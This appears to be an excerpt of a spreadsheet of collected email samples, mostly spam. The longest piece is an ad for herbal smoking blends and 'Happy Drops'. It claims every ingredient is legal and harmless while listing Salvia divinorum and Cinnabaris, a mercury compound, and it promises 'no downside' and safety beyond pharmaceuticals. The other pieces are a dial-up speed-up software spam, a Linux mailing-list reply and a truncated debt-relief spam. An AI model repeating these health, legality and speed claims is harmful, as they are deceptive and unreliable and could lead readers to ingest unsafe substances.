 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon "sensitive/responsive" herbas primarily cultivated within and imported from the southern and eastern hemispheres ... Temple 3 Ragga Dagga (tm) high-ratio, factored, botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the "happiness" coffee and tea houses of Nepal, Kathmandu or Amsterdam, and in many aspects, possesses a more collected and more focused, less-scattered ambience. 
 Ingredients:
 Temple smoking substances and Temple 3 Ragga Dagga (tm) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES "House Smoking Substance Specialties."  Temple 3 Ragga Dagga (tm) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple 3 Ragga Dagga (tm) is a proprietary, prescribed botanical amalgamation which includes the following synergistically/synesthesia conglomerated, core-refined, ratio-enhanced herbas/botanicals, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1, to 100 to 1 viripotent concentrations Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Hybrid Flowering Turnera Diffusa, Capillaris Herba, Angelica Root, Wild Dagga mature leaf matter, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian stems, Calea Zacalechichi buddings, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshura cuttings. 
 Please Note:  Temple 3 Ragga Dagga (tm) is an absolutely legal, herba/botanical, "Personal Choice," pipe-smoking substantiality product!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple 3 Ragga Dagga (tm).  There is certainly no cannabis/marijuana in Temple 3 Ragga Dagga (tm).  And although we are not age-governed by law, Temple 3 Ragga Dagga (tm) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple 3 Ragga Dagga (tm) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their time.  As well, Temple 3 Ragga Dagga (tm) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physician's care in any regard.
 *********************************
 AQUEOUS KATHMANDU
 *********************************
 For those who choose not to smoke ... we have something for you.  Introducing Aqueous Kathmandu "Happy Drops" (tm).
 Aqueous Kathmandu (tm) "Sensitive/Responsive" Happiness Drops....(Temple "Quantum" Variety)....Indeed; a Happiness Brew from the Kathmandu....a.k.a. "Secret Fire"....from a toke-smoke point of view, if you know what I mean and be groovin' the scene.... Who du the Kathmandu?  Now....everybody can du the Kathmandu!  (that is, if you're 21 years of age or older....)  Aqueous Kathmandu is engaged to holistically inspire and instill "sensitive/responsive"; happiness and mellowness without the detriment of carcinogenic inhalation (smoking).  Aqueous Kathmandu is absolutely legal and does not contain any controlled, considered to be harmful or regulated herbs or cannabis/marijuana factors!!!! 
 As "smoking" has become so socially taboo over the years and as so many people have asked us for a liquid product, we have long strived to bring a quantum-factored/concentrated liquid product to fruition. This has been no easy task for a variety of botanical and technological reasons.  Finally; we are able to say that this task has been accomplished....a "Sensitive" herbal/botanical awakening, if you will....as we have introduced and brought to market Aqueous Kathmandu (tm) Happiness Drops, Temple "Quantum" Variety, a.k.a...."Secret Fire".  "Secret fire"....indeed!!!
 This liquid innovation affords us four factors within this particular botanical equation that were previously not realized....
 1) The ability to engage a more substantial, high-ratio, concentrated application of particular botanical factors that are utilized in our personal-choice, "sensitive/responsive" pipe-smoking product.
 2) The ability to extract high-ratio concentrates of certain botanical factors that are not applicable to a smoking commodity, as they cannot be extracted into dry format.  (Please note....all botanical factors included in all/any of our products are absolutely legal.  In the instance of Aqueous Kathmandu, we are simply able to enjoy the advantages of specific legal herbas that just are not dry concentrate-applicable.
 3) A most notable assimilation factor....being that liquid is more easily and therefore more generally metabolistically assimilated and as such, more "absolute"; in that herba/botanical applications via the administrative vehicle of "Smoke" possess a much wider variance in just how efficiently that "Smoke" is integrated metabolistically, psychologically and perspectively
 4) Therein, we have created a unique uniqueness between a "Smoke" and a "non-Smoke"....sort of like the camaraderie between indicas and sativas, if you will....different aspects of the same botanical genus arrangement.  Each "impeccable" singularly.... And at this juncture we will also mention to those of you who are not so anti-smoking something....that Aqueous Kathmandu (tm) Happiness Drops and the more traditional Temple "3" Ragga Dagga (tm) personal-choice, pipe-smoking substance indeed establish an enchanting "camaraderie". (Please refer to, "Introductory Offers".) 
 * No need to smoke.  No carcinogenic factors!
 * Absolutely legal!  No prescription required!
 * Does not include cannibis or any tobacco variety.
 * Marvelously potent.  Remarkably substantial!
 * Inspires contemplativeness and creativity!
 * Adjusts attitude &amp; mood enhancement. Relaxes stress &amp; anxiety.
 * Better than Kava Kava, St. John's Wort, etc.  Similar to but variant from Ragga Dagga.
 * Certainly safer than pharmaceuticals!
 * Many fine ganja virtues with none of the negatives!
 * Better sleeping ... better dreaming.
 * Non-invasive ... no downside.
 * An exquisite compliment with Temple 3 Ragga Dagga (tm) -- (See Intro Offers)
 * Quite simply ... it is a Superior product!
 Contents: Aqueous Kathmandu is a unique botanical substantiality.  It is offered and marketed as such.  Undisputedly, it achieves "distinctive accolade" of its own merit....  Aqueous Kathmandu is absolutely legal and does not contain any controlled or regulated or harmful herbs or cannabis factors.  However, it is our mandatory ethical policy that Aqueous Kathmandu not be offered to individuals who have not yet attained at least 21 years of age (all things in their time....).  Please note as well that Aqueous Kathmandu is not intended for usage during work or while driving.  And, as is true of all substance and indulgence, this product should not be enjoyed during pregnancy.  This proprietary formulation does include the following quantum-ratio, core-extracted/refined botanicals in an alcohol base as a preservative: Albizzia flower-tops, Drachsha, Chavana Prash, Lactuca Virosa, Hybrid Flowering Turnera Diffusa, Wild Dagga, Capillaris Herba, Angelica Root, Zizyphi Spinosae, Buplerum, Hybrid Valeriana officinalis Root, Albizzia flower-tops, mature Polygonum Vine, Calea Zacatechichi, Crocus Sativa flower-tops, Leonorus Sibricus buds, Cinnabaris, Margarita herba, Biotae Orientalis, Salviae Miltiorrhizae.... Usage Instructions: Shake well. Mix 30-50 drops with juice or water (best on empty stomach). Ambiance lasts about two hours or so. Not intended for use during pregnancy or while working or driving. Keep out of reach of children.
 **************************
 STONEY MAHONEY
 **************************
 In regard to the introduction of Stoney Mahoney (tm) "personal choice" smoking substantiality product, we have strived for years to develop a consummate "Sensitive/Responsive" (loose-leaf) smoking product, "Amsterdam Cup" style so to speak!
 With acquired knowledge via the development of such notable "personal choice" smokeables, as Wizard Smoke (tm), Dream Smoke (tm), Dragon Smoke (tm), Vajroli Mudra (tm), Stashish (tm), ShemHampHorash (tm), Yerba lena Yesca (tm), Weed (tm), Kathmandu Temple Kiff (tm) 1 &amp; 2 &amp; 3, which for the most part have been proprietary formulations, of which the rights have been sold to other less aggressive, less developmental companies, we arrived at the lofty "personal choice" smoking status of our premier Ragga Dagga (tm) solid pipe-smoking product.  
 After all of this, we had come to the technological and philosophical point of view that we could not conjure a loose-leaf formulation that would provide effectuality that would be more significant than that of our much-heralded Ragga Dagga (tm) solid-format pipe smoking product.  Mostly, we were right about this, as this new Stoney Mahoney "agenda" is not so much significant as in "better", but "Signature Significant" as in "uniqueness," in that we chanced upon a new world class, botanical source for the rare "true-brid" variety of Artemisia absinthum (flowering tops only), which at one time in history was distilled into "Absinthe," a greenish, aniseed flavored liqueur which heralded certain euphoric and narcotic attributes which ultimately resulted in it being declared illegal.  As well, we have finally perfected our exclusive "kiffening" technique, which inspires and establishes alkaloid and glycoside potentiation (enhancement) on a molecular level.  Hence, we introduce (although supply is limited) this highly "potentiated" Stoney Mahoney (tm) smoking product! Loose-leaf "personal choice" doesnt get any "sweeter" than this!  
 And for all of you Ragga Dagga fans, please note that, indeed, it isnt so much that Stoney Mahoney loose-leaf is more viripotent than the Ragga Dagga solid-format.  Moreover, it is that Stoney Mahoney is effective in a much different way than Ragga Dagga.  Sort of like apples and oranges, like Panamanian and Jamaican, like Indica and Sativa, if you will!  Within our test marketing, even traditional "Kind Bud" aficionados have magnanimously acclaimed this Stoney Mahoney jester variety.  Most folks say that Ragga Dagga motivates them in an up "Sativa" sort of way, and that Stoney Mahoney mellows them out or giggles them out in a "soma," Indica sort of way.  If Stoney Mahoney has any shortcoming at all, it is quite simply that due to the extreme "kiffening" of this product, it may be to the uninitiated practitioner, a harsh draw.  It is for this reason that in addition to the inclusion of a standard herb pipe and package of rolling papers, we also include a brass, personal water-pipe (hookah).  As is true for many high-minded folks, a water-pipe filled with chilled water or wine will temperament the demonstrativeness of Stoney Mahoneys draw.  
 * Indica oriented.
 * Definitely happy smoking!
 * Mood enhancer.
 * Smokeable &amp; brewable mood food!
 * Good-bye stress, anxiety, &amp; restlessness.
 * Sleep deep -- Good-bye funky dreams!
 * Hornier than horny goatweed!
 * Superlative mixer with Ragga Dagga and/or Aqueous Kathmandu.
 * Roll it or bowl it or brew it ...
 * Just a pinch goes a long, long way ...
 * Possesses many fine ganja virtues with none of the negatives.
 * Non-invasive.
 * Absolutely Legal!
 * Rolling papers, herb pipe &amp; personal brass water pipe (hookah)are included.
 Attention! Attention! We have, by popular demand and in the interest of good economics, created an introductory offer that features both Ragga Dagga and Stoney Mahoney products and, also, still another introductory offer which includes Ragga Dagga, Stoney Mahoney and, for you non-smokers, our Aqueous Kathmandu Happiness Drops (these are pretty special!).  And to mention furthermore, for non-smokers, Stoney Mahoney (Jester Variety) loose-leaf product is also a brewable delight.  A tea for thee.)
 Please Note:  Stoney Mahoney (Jester Variety) (tm) is an absolutely legal, herba/botanical, "Personal Choice," loose-leaf substantiality smoking product!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Stoney Mahoney (Jester Variety) (tm).  There is certainly no cannabis/marijuana in Stoney Mahoney (Jester Variety) (tm).  And although we are not age-governed by law, Stoney Mahoney (Jester Variety) (tm) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Stoney Mahoney (Jester Variety) (tm) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  As well, Stoney Mahoney (Jester Variety) (tm) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physician's care in any regard.
 Stoney Mahoney (Jester Variety) (tm), factored in an Absinthium Labyrinthine Configuration, is an exclusive, kiffened, loose-leaf, primo modino, "Sensitive/Responsive," Smoking and/or Brewing Herba which may be, depending upon preference, rolled or bowled or brewed.
 As is an herbalists way, three or four draws of Smoke should be inhaled and retained.  For the non-smoker, it is most appropriate to engage this herba as a potentiated tea/brew.  (Steep approximately one tea-spoon of Stoney Mahoney herba per one cup of water for ten minutes or so &amp; strain.)  When smoking Stoney Mahoney, please draw gently as Stoney Mahoney is a most preeminent "Sensitive/Responsive" Smoke and may be considered to be a harsh draw to the uninitiated practitioner.  (Water-pipe is included with each package of Stoney Mahoney (Jester Variety).)
 Stoney Mahoney contains and is kiffened with the following exotica botanicals and botanical extracts &amp; essences: Dutch Lactuca virosa, Bulgarian Artemisia absinthum (flowering-tops only), Yucatan Turnera aphrodisaca, Chinese Valeriana ceae, Jamaican Verbena officinalis, Spanish Peumus boldo, and European (flowering-tops only) Sarothamnus Scoparius. Stoney Mahoney does not include any tobacco or any cannabis factors. Stoney Mahoney does indeed achieve distinction upon its own merit....
 *************************************************
 *************************************************
 We offer other fine herbal, botanical products including the following:
 1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living ... 
 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...
 5.  Cockle Doodle Doo (tm) Penile Restorative/Renewal/Enhancement Souffle' ... an exclusive, proprietary blendage created to dramatically/emphatically, aggrandize/enhance &amp; age-inhibit penile skin quality and vascular composure.  Soothes, refreshes, provides a youthful Glow &amp; Go sensitivity.    
 6.  "Hairricane" (tm) -- an Extreme High-Ratio, Dry Botanical Extract Herba Dietary Hair Supplement for Men &amp; Women
 ========================================================
 PRICING INFORMATION:
 1.    TEMPLE 3 RAGGA DAGGA (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 
 2.    AQUEOUS KATHMANDU "HAPPY DROPS" (tm)
 One - 2 oz. bottle (90+ usages)    $115.00
 Two - 2 oz. bottles                $170.00
 3.    STONEY MAHONEY (tm) Jester Variety Loose Leaf
 One - 2 oz. package 		   $150.00
 Two - 2 oz. packages               $225.00
 Each 2 oz. package of Stoney Mahoney includes 
 1 pkg. of clipped-rolling papers, a traditional
 herb pipe &amp; a brass, personal water-pipe (hookah).
 Sorry, but due to a limited supply of Stoney Mahoney (Jester Variety) only a maximum purchase of two - 2 oz. packages per customer is allowed per order.
 4.    SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 5.    SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 6.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 7.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
 **  3-pack  (270 tablets)    $83.00
 **  6-pack  (540 tablets)    $126.00 (save $40.00)
 **  9-pack  (810 tablets)    $159.00 (save $90.00)
 **  12-pack (1,080 tablets)  $192.00 (save $140.00)
 8.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
 **  3-pack  (3 - 4 oz. bottles)     $83.00
 **  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
 **  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
 **  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)
 9.    Dynamic Duo Introductory Offers 
 **  3-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $126.00 (save $40.00)
 **  6-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $159.00 (save $50.00)
 **  9-pack Equivalence Tabs &amp; 6-pack Dragon Wing   $215.00 (save $70.00)
 **  12-pack Equivalence Tabs &amp; 9-pack Dragon Wing  $271.00 (save $80.00)
 10.  COCKLE DOODLE DOO (tm) Souffle
 One (1) 2 oz. jar ..........   $92.00
 Two (2) 2 oz. jars .........  $176.00
 Six (6) 2 oz. jars .........  $320.00
 11.  "HAIRRICANE" (tm)
 **  3 Pack (3 bags of 90 capsules each)..... $102.00
 **  6 Pack (6 bags of 90 capsules each)..... $174.00 (SAVE $30)
 ** 12 Pack (12 bags of 90 capsules each).... $288.00 (SAVE $40)
 12.  ALPHA INTRODUCTORY OFFER
 * One (1) 2 oz. pkg. of Stoney Mahoney
 * One (1) 2 oz. jigget/bar of Temple 3 Ragga Dagga
 Price:  $190.00 (Reg. $265.00  Save $75)
 13.  BETA INTRODUCTORY OFFER
 * One (1) 2 oz. pkg. of Stoney Mahoney
 * one (1) 2 oz. pkg. of Temple 3 Ragga Dagga 
 * One (1) 2 oz. bottle of Aqueous Kathmandu Happiness Drops
 Price:  $240.00 (Reg. $380.00  Save $140)
 14.  INTRO OFFER "A"
 * One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
 * One (1) tin (100 tablets) of Seventh Heaven Prosaka
 * One (1) jar (300 tablets) of Seventh Heaven Gentle Ferocity 
 Price:  $200.00 (Reg. $285.00  Save $85) 
 15.  INTRO OFFER "B" 
 * One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
 * One (1) jar (300 tablets) of Seventh Heaven Gentle Ferocity.  
 Price:  $170.00 (Reg. $245.00  Save $75) 
 16.   INTRO OFFER "C"
 * One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
 * One (1) tin (100 tablets) of Seventh Heaven Prosaka.  
 Price:  $125.00 (Reg. $155.00  Save $30) 
 17.  INTRO OFFER "D"
 * One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
 * One (1) 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.
 Price:  $150.00 (Reg. $205.00  Save $55)  
 18.  INTRO OFFER "E"
 * One (1) 2.0 oz. jigget / bar of Temple 3 Ragga Dagga
 * One (1) 1 oz. bottle of Sweet Vjestika Aphrodisia Drops
 * One (1) tin (100 tablets) of Seventh Heaven Prosaka
 * One (1) jar (300 tablets)of Gentle Ferocity 
 Price:  $260.00 (Reg. $375.00  Save $115)  
 19.  INTRO OFFER "F"
 * One (1) 2 oz. jar of Cockle Doodle Doo Souffle'
 * One (1) 2 oz. jigget/bar of Temple 3 Ragga Dagga
 * One (1) 1 oz. bottle of Sweet Vjestika Love Drops
 Regular Price $297.00.  Yours for only $197.00.  SAVE $100.00!
 20.  INTRO OFFER "H"
 * One (1) 2 oz. bottle of Aqueous Kathmandu
 * One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
 Price:  $155.00 (Reg. $230.00  Save $75)
 21.  INTRO OFFER "I"
 * One (1) 2 oz. bottle of Aqueous Kathmandu
 * One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
 * One (1) 1 oz. bottle of Sweet Vjestika
 Price:  $235.00 (Reg. $320.00  Save $85)
 22.  INTRO OFFER "J"
 * One (1) 2 oz. bottle of Aqueous Kathmandu
 * One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
 * One (1) 1 oz. bottle of Sweet Vjestika
 * One (1) 300 tablet jar of Gentle Ferocity 
 Price:  $295.00 (Reg. $450.00  Save $155)
 23.  INTRO OFFER "K"
 * One (1) 2 oz. bottle of Aqueous Kathmandu
 * One (1) 1 oz. bottle of Sweet Vjestika
 Price:  $150.00 (Reg. $205.00  Save $55)
 **************************************************
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
 Call 1-623-972-5999
 Monday - Saturday -- 9:00 AM to 6:00 PM (Mountain Time)
 For all domestic orders, add $7.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $22.00 for International orders.
 ====================================================
 To remove your address from our list, click on the following link and send a blank email.  mailto:adsub68@btamail.net.cn?subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Web Pages Load 300% Faster without cable or DSL
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY bgColor=3Dwhite&gt;
 &lt;CENTER&gt;
   &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D537 border=3D0&gt;
     &lt;TBODY&gt; 
     &lt;TR&gt; 
       &lt;TD bgColor=3Dwhite colSpan=3D3&gt; 
         &lt;CENTER&gt;
           &lt;FONT face=3DVerdana color=3D#cc0000 size=3D5&gt;&lt;I&gt;&lt;B&gt;Web Pages Lo=
 ad 300% Faster!&lt;BR&gt;
           &lt;/B&gt;&lt;/I&gt;&lt;/FONT&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR height=3D71&gt; 
       &lt;TD vAlign=3Dbottom bgColor=3Dwhite colSpan=3D2 height=3D71&gt; 
         &lt;CENTER&gt;
           &lt;IMG height=3D71 src=3D"http://www.npag.net/xweb/tipsXLlogoY.gif=
 " 
       width=3D332&gt;&lt;BR&gt;
           &lt;FONT size=3D1&gt;&lt;BR&gt;
           &lt;/FONT&gt;&lt;FONT color=3D#cc0000&gt;&lt;B&gt;Named Online Software Product of=
  the Year&lt;BR&gt;
           &lt;/B&gt;&lt;/FONT&gt;&lt;FONT color=3Dblack size=3D2&gt;&lt;B&gt;by AGI Consultants&lt;BR=
 &gt;
           &lt;/B&gt;&lt;/FONT&gt; 
           &lt;HR noShade SIZE=3D1&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
       &lt;TD vAlign=3Dbottom height=3D71&gt; 
         &lt;CENTER&gt;
           &lt;IMG height=3D122 src=3D"http://www.npag.net/xweb/handwatchY.gif=
 " width=3D75&gt; 
           &lt;HR noShade SIZE=3D1&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD bgColor=3Dwhite colSpan=3D3&gt; 
         &lt;CENTER&gt;
           &lt;A href=3D"http://www.tipsxcelaweb.com/cgi-bin/rot-july19.cgi"&gt;&lt;=
 FONT 
       face=3DVerdana color=3D#cc0000 size=3D6&gt;&lt;I&gt;&lt;B&gt;FREE 7-Day Trial&lt;/B&gt;&lt;/=
 I&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3DVerdana color=3D#cc0000 size=3D1&gt; 
           &lt;/FONT&gt;&lt;FONT face=3DVerdana color=3D#000066 
       size=3D1&gt;&lt;I&gt;&lt;B&gt;&lt;BR&gt;
           &lt;BR&gt;
           &lt;/B&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;FONT face=3DHelvetica 
       color=3D#000066&gt;&lt;B&gt;Unique Software Solution Opens&lt;BR&gt;
           Private High Speed Network-&lt;BR&gt;
           No Cable or DSL Connection Required!&lt;BR&gt;
           You'll Be Amazed!&lt;/B&gt;&lt;/FONT&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD width=3D17 bgColor=3Dwhite&gt;&lt;/TD&gt;
       &lt;TD width=3D339 bgColor=3Dwhite&gt;&lt;BR&gt;
       &lt;/TD&gt;
       &lt;TD bgColor=3Dwhite&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR height=3D63&gt; 
       &lt;TD bgColor=3Dwhite colSpan=3D3 height=3D63&gt; 
         &lt;CENTER&gt;
           &lt;TABLE cellSpacing=3D2 cellPadding=3D3 width=3D551 border=3D0&gt;
             &lt;TBODY&gt; 
             &lt;TR&gt; 
               &lt;TD width=3D253&gt;&lt;FONT face=3DHelvetica color=3Dblack&gt;&lt;B&gt;* Ke=
 ep Your Internet 
                 Provider!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               &lt;TD width=3D15&gt;&lt;/TD&gt;
               &lt;TD&gt;&lt;FONT face=3DHelvetica color=3Dblack&gt;&lt;B&gt;* Perfect for PC=
 's, and 
                 Laptops!&lt;BR&gt;
                 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
             &lt;/TR&gt;
             &lt;TR&gt; 
               &lt;TD width=3D253&gt;&lt;FONT face=3DHelvetica color=3Dblack&gt;&lt;B&gt;* Ke=
 ep Your Dial-up 
                 Modem!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               &lt;TD width=3D15&gt;&lt;/TD&gt;
               &lt;TD&gt;&lt;FONT face=3DHelvetica color=3Dblack&gt;&lt;B&gt;* &lt;/B&gt;&lt;/FONT&gt;&lt;A 
             href=3D"http://www.tipsxcelaweb.com/cgi-bin/rot-july19.cgi"&gt;&lt;F=
 ONT 
             face=3DHelvetica&gt;&lt;B&gt;Read Testimonials!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;FONT 
             face=3DHelvetica 
       color=3Dblack&gt;&lt;B&gt;&lt;BR&gt;
                 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
             &lt;/TR&gt;
             &lt;/TBODY&gt;
           &lt;/TABLE&gt;
           &lt;BR&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD vAlign=3Dbottom colSpan=3D3&gt; 
         &lt;CENTER&gt;
           &lt;FONT face=3DVerdana color=3D#cc0000 size=3D4&gt;&lt;B&gt;FREE&lt;I&gt; 7-Day T=
 rial! &lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
       href=3D"http://www.tipsxcelaweb.com/cgi-bin/rot-july19.cgi"&gt;&lt;FONT 
       face=3DVerdana color=3D#000066 size=3D2&gt;&lt;B&gt;CLICK for 1-min. Download=
 &lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;B&gt;&lt;FONT face=3DVerdana size=3D2&gt;&lt;BR&gt;
           &lt;/FONT&gt;&lt;FONT 
       face=3DVerdana color=3D#cc0000 size=3D1&gt;&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
       href=3D"http://www.tipsxcelaweb.com/cgi-bin/rot-july19.cgi"&gt;&lt;FONT 
       face=3DVerdana color=3D#000066&gt;Learn How to Get it Free Permanently!=
 &lt;BR&gt;
           &lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3DVerdana color=3D#cc0000 
       size=3D1&gt;&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
       href=3D"http://www.tipsxcelaweb.com/cgi-bin/rot-july19.cgi"&gt;&lt;FONT 
       face=3DVerdana color=3D#cc0000 size=3D5&gt;&lt;I&gt;SPEED UP EMAIL TOO!&lt;/I&gt;&lt;/=
 FONT&gt;&lt;FONT 
       face=3DVerdana size=3D5&gt;&lt;I&gt;&lt;BR&gt;
           &lt;HR noShade SIZE=3D1&gt;
           &lt;/I&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;
         &lt;/CENTER&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD width=3D17&gt;&lt;/TD&gt;
       &lt;TD colSpan=3D2&gt;&lt;FONT size=3D1&gt;&lt;B&gt;&lt;BR&gt;
         &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt;"I was going to sign up for cable modem service, but=
  they 
         want $50 per month, plus I had to pay $120 for the&amp;nbsp;cable mode=
 m. Then 
         I had to pay&amp;nbsp;a guy to hook it all up.&amp;nbsp;You guys rule!!!"&lt;=
 BR&gt;
         &lt;/B&gt;&lt;FONT color=3D#000066&gt;(Roger S. from&amp;nbsp;Teaneck, NJ.)&lt;BR&gt;
         &lt;BR&gt;
         &lt;/FONT&gt;&lt;FONT color=3Dblack&gt;&lt;B&gt;"Nice job guys!!!&amp;nbsp;Your software=
  file 
         size is small, the download was quick and I can see a noticeable i=
 mprovement 
         in access speed. I am recommending it to all of our clients."&lt;BR&gt;
         &lt;/B&gt;&lt;/FONT&gt;&lt;FONT color=3D#000066&gt;(Computers Are Easy to Use-Raj Pa=
 tel)&lt;/FONT&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt;
       &lt;TD width=3D17&gt;&lt;/TD&gt;
       &lt;TD colSpan=3D2&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, Helvetica, sans-serif"=
  color=3D"#666666"&gt;Your 
           email address was obtained from a purchased list, reference #172=
 -54a. 
           If you wish to unsubscribe from this list, please &lt;a href=3D"htt=
 p://www.infowks.com/data1/main_remove.htm"&gt;Click 
           Here&lt;/a&gt;. All unsubscribe requests are honored.&lt;/font&gt;&lt;/p&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;/TBODY&gt;
   &lt;/TABLE&gt;
 &lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane mentioned:
 &gt; It *is* a good idea though.  I've been 
 &gt; wondering about the same thing for a couple
 &gt; of months now but always considered it too
 &gt; complicated to carry out. (If that makes any
 &gt; sense at all).
  It is to complex. Look at the mess that is gentoo. Just because you can
 do something, doesn't mean you should.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Too many credit card bills! - this fixes that!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled Document&lt;/TITLE&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.3315.2870" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff leftMargin=0 text=#000000 topMargin=0 marginheight="0" 
 marginwidth="0"&gt;
 &lt;TABLE background=http://65.162.84.5/images/051402_001_email_bg_02.jpg border=0 cellPadding=0 
 cellSpacing=0 height=409 width=562&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top&gt;&lt;IMG height=120 src="http://65.162.84.5/images/051402_001_1x1.gif" 
       width=562&gt;&lt;BR&gt;&lt;IMG align=left height=280 hspace=0 
       src="http://65.162.84.5/images/051402_001_1x1.gif" width=75&gt; &lt;B&gt;&lt;FONT color=#2e4361 
       face="Arial, Helvetica, sans-serif" 
       size=5&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;WE CAN HELP YOU 
 ...&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;TABLE background=http://65.162.84.5/images/051402_001_1x1.gif border=0 cellPadding=0 
       cellSpacing=0 height=142 width=480&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD height=143 vAlign=top width=344&gt;&lt;FONT 
             face="Arial, Helvetica, sans-serif" size=2&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt;&amp;nbsp;Reduce Your 
             Monthly Payment up to 60%.&lt;BR&gt;&lt;IMG height=14 
             src="http://65.162.84.5/images/051402_001_checkmark.jpg" width=15&gt;&amp;nbsp;Lower Your Credit 
             Card Interest Rates.&lt;BR&gt;&lt;IMG height=14 
